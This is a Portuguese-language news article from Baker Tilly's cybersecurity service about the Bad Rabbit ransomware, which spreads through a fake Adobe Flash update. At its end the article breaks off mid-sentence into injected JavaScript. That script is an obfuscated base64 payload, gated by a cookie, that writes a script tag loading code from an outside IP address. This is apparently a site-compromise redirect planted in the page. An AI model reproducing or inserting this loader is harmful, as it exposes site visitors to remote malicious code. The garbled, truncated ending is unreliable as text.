Serviço de Cibersegurança da Baker Tilly alerta para nova ameaça de ataque virtual
Rússia, Ucrânia e outros países foram afetados no fim da manhã de hoje; vírus está se espalhando através de um falso pedido de atualização do Adobe Flash
Uma nova camada de ransomware apelidada de “Coelho Mau”, ou Bad Rabbit, foi encontrada infectando computadores na Rússia, Ucrânia e em outros lugares. O malware afetou sistemas em três sites russos, um aeroporto na Ucrânia e uma estrada de ferro na capital, Kiev.
De acordo com a especialista em Segurança da Informação Juliana Nicolau, gerente da Baker Tilly, o ataque deve atingir o Brasil entre hoje e amanhã. Segundo ela, o malware ainda não pode ser capturado pelos programas antivírus.
Uma empresa de segurança, a Eset, disse que o vírus foi distribuído através de uma falsa atualização do Adobe Flash. “Por isso, fiquem atentos e não façam atualizações durante a ameaça. Repassem a informação e monitorem seus equipamentos”.
Juliana Nicolau explicou que o Bad Rabbit criptografa o conteúdo do computador ou qualquer outra plataforma conectada à internet e solicita um pagamento. “Neste caso, 0,05 bitcoins, ou cerca de 280 dólares. Mas, não há nenhum indício de que o pagamento vá garantir a devolução do acesso”.
O ataque tem semelhanças com os surtos WannaCry e Petya ransomware que se espalharam pelo mundo causando uma interrupção generalizada no início deste ano.
As empresas de segurança cibernética, incluindo a Kaspersky, com sede na Rússia, disseram que estão monitorando o ataque.
O pesquisador Kevin Beaumont publicou uma captura de tela que mostra o Bad Rabbit criando tarefas no Windows, nomeado após os dragões Drogon e Rhaegal na série de TV Game of Thrones.
O chefe da ciberpolícia na Ucrânia confirmou à agência de notícias da Reuters que Bad Rabbit foi o ransomware responsável.
No entanto, ainda não se sabe até que ponto este novo malware poderá se espalhar.
“Em algumas das empresas, o trabalho foi completamente paralisado – servidores e estações de trabalho são criptografados”, disse o chefe da empresa russa de segurança cibernética Group-IB, Ilya Sachkov, na agência de notícias TASS.
Dois dos sites afetados são Interfax e Fontanka.ru.
Enquanto isso, autoridades norte-americanas disseram que “receberam vários relatórios de infecções de ransomware de Bad Rabbit em muitos países ao redor do mundo”. (“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘
